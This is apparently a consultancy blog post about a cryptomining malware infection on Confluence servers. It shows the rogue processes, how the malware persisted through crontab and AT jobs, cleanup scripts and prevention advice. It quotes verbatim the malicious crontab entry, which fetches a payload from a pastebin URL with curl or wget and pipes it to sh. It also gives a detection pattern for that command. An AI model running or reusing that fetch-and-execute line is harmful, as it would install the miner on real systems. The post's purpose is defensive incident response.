This post was co-authored with Bob Wen.
It's very rare that we get to write in the style of our favorite blogger, Dr. John Watson, but something happened this week that seemed like it leaped out of the pages of The Strand.
At Isos, we recently started seeing a rash of Confluence servers going down at our clients' sites.
Once we logged in, we ran "top" on one of the Confluence servers and came across the following:
The "normal" Confluence process (seen as a Java command) was taken over, replaced by a "khugepageds" process.
We then discovered that we weren't alone...
So, an exploit was taking advantage of a security vulnerability in Confluence to mine cryptocurrency! When we killed the khugepageds process and removed the crontab job, a separate process restarted the miner and recreated the crontab job!
Here's how we took care of this malware.
CentOS/RHEL based OS:
The issue looks slightly different on Red Hat-based OSes.
[root@fcrwprlnjiraapp2 ~]# ps -ef | grep 9001
9001 2883 1 0 Apr15 ? 00:02:02 sh
9001 4117 1 0 Apr15 ? 00:00:00 sh
9001 5283 1 3 Apr15 ? 00:34:17 /usr/bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/current/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dconfluence.context.path= -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dsynchrony.enable.xhr.fallback=true -Xms1024m -Xmx1024m -XX:+UseG1GC -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -XX:G1ReservePercent=20 -Xloggc:/opt/atlassian/confluence/current/logs/gc-2019-04-15_16-23-20.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCDateStamps -XX:-PrintTenuringDistribution -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/current/bin/bootstrap.jar:/opt/atlassian/confluence/current/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence/current -Dcatalina.home=/opt/atlassian/confluence/current -Djava.io.tmpdir=/opt/atlassian/confluence/current/temp org.apache.catalina.startup.Bootstrap start
9001 11280 1 0 Apr15 ? 00:00:05 /usr/sbin/atd
9001 11541 1 99 Apr15 ? 1-01:11:53 dblaunchs
9001 30041 4117 0 09:31 ? 00:00:00 sleep 30
root 30151 29799 0 09:31 pts/6 00:00:00 grep 9001
9001 31778 5283 0 Apr15 ? 00:04:32 /usr/java/jdk1.8.0_51/jre/bin/java -classpath /opt/atlassian/confluence/current/temp/2.1.0-release-confluence_6.5-1a01ab2d.jar:/opt/atlassian/confluence/atlassian-confluence-6.6.4/confluence/WEB-INF/lib/mysql-connector-5.1.26.jar -Xss2048k -Xmx1g synchrony.core sql
Instead of crontab, this exploit was using the AT job scheduler. The process "dblaunchs" was the one eating all the CPU, but killing that process wasn't enough.
The only legitimate processes here are the 2 Java processes (Confluence and Synchrony). Everything else must go.
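As a rough illustration of "everything else must go", the sketch below filters process and AT job listings down to the entries worth reviewing. The helper names suspect_pids and at_jobs_for_user are hypothetical, and the code assumes that java is the only legitimate command for this account and that atq prints the job owner as the last field, as it usually does on Linux. It only prints candidates; nothing is killed or removed.

```shell
#!/bin/sh
# Sketch only: helper names are hypothetical, not from the original write-up.

# Read "PID COMMAND" pairs on stdin and print the PIDs whose command is not java.
# Assumes the Java processes are the only legitimate ones for this account.
suspect_pids() {
    awk 'NF >= 2 && $2 != "java" { print $1 }'
}

# Read atq output on stdin and print the job numbers owned by the given user.
# Assumes the usual Linux atq layout, where the owner is the last field.
at_jobs_for_user() {
    awk -v user="$1" '$NF == user { print $1 }'
}

# Example (run as root, and review the output before acting on it):
#   ps -u <confluence_user> -o pid=,comm= | suspect_pids
#   atq | at_jobs_for_user <confluence_user>
```

The printed PIDs can then be passed to kill, and the printed job numbers to atrm, once you have confirmed that none of them are legitimate.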
Ubuntu/Debian based OS
Upon logging in, the first thing we noticed was there were a couple of strange processes running on the Confluence servers. That led me to this article.
... which prompted us to check the 'confluence' user's crontab jobs.
You can check this as the root user with crontab -l -u <confluence_user>, where confluence_user is the Unix account responsible for running the Confluence process.
root@atlassian-confluence-prod-tp1v:~$ su - confluence
confluence@atlassian-confluence-prod-tp1v:~$ crontab -l
*/10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
Unless you have created legit cron jobs for the Confluence user, there shouldn't be anything returned.
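If the account does have legitimate cron jobs, a quick filter can help pick out the malicious entry. The sketch below flags crontab lines that pipe a curl or wget download straight into a shell, which is the shape of the entry we found. The function name suspicious_cron_lines is hypothetical and the pattern is only a heuristic, so treat a clean result as a hint rather than proof.

```shell
#!/bin/sh
# Sketch only: suspicious_cron_lines is a hypothetical helper.

# Read crontab text on stdin and print the entries that pipe a curl/wget
# download into sh or bash. Prints nothing when no entry matches.
suspicious_cron_lines() {
    grep -E '(curl|wget)[^#]*[|][[:space:]]*(ba)?sh' || true
}

# Example (run as root):
#   crontab -l -u <confluence_user> | suspicious_cron_lines
```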
Needless to say, I immediately removed the cron job...
confluence@atlassian-confluence-prod-tp1v:~$ crontab -r
... and about 10 seconds later, it came back even though I had killed the processes...
confluence@atlassian-confluence-prod-tp1v:~$ killall khugepageds
confluence@atlassian-confluence-prod-tp1v:~$ crontab -l
*/10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
There had to be a different process recreating it. So we checked whether any other processes were running as the Confluence user and, sure enough, there was another process, "[kerberods]", that was re-spawning the crontab entry and launching the CPU-killing processes.
confluence@atlassian-confluence-prod-tp1v:~$ ps -ef | grep conflue\+
conflue+ 19400 1 0 18:00 ? 00:00:51 [kerberods]
conflue+ 30606 1 99 21:59 ? 00:06:39 /tmp/khugepaged
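Because one process keeps re-creating the other along with the crontab entry, killing them one at a time leaves a window for a respawn. One common way around this, which is our suggestion here rather than a record of the exact commands we ran, is to freeze every suspect process with SIGSTOP before killing any of them, and only then remove the crontab. The sketch below prints such a plan for review instead of executing it. The name kill_plan is hypothetical, and it assumes the Confluence user has no legitimate cron jobs.

```shell
#!/bin/sh
# Sketch only: kill_plan is a hypothetical helper, not from the original write-up.
# Reads PIDs on stdin and PRINTS commands for review; it executes nothing itself.
kill_plan() {
    user="$1"
    pids=""
    while read -r pid; do
        case "$pid" in
            ''|*[!0-9]*) continue ;;   # skip anything that is not a plain number
        esac
        pids="$pids $pid"
    done
    # Freeze everything first so no process can respawn another mid-cleanup.
    for pid in $pids; do echo "kill -STOP $pid"; done
    # Then kill the frozen processes.
    for pid in $pids; do echo "kill -KILL $pid"; done
    # Finally drop the user's crontab (assumes it holds no legitimate jobs).
    echo "crontab -r -u $user"
}

# Example, using the two PIDs from the listing above:
#   printf '19400\n30606\n' | kill_plan confluence
```

After running the printed commands as root, check crontab -l -u <confluence_user> again a minute or so later to confirm the entry has not come back.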
How to prevent
Upgrade to a bug fix release that is appropriate for the feature release you are on currently. If this is not feasible, disabling the apps "Widget Connector" and "WebDav Plugin" should be enough to close the door.
Disabling the WebDav Plugin may have other consequences, so it might be a good excuse for an emergency downtime to get the upgrade done.
One side effect we discovered involves the "Edit in Office" functionality for attached MS Office files: it doesn't work without those apps enabled, and it doesn't come back automatically when you re-enable them.
The best thing to do after things seem stable again is to replace the server(s). This is not always feasible, but if you are running the Confluence Data Center in AWS/GCP there is a good chance you have auto provisioning happening in some way, so server replacement might be relatively easy.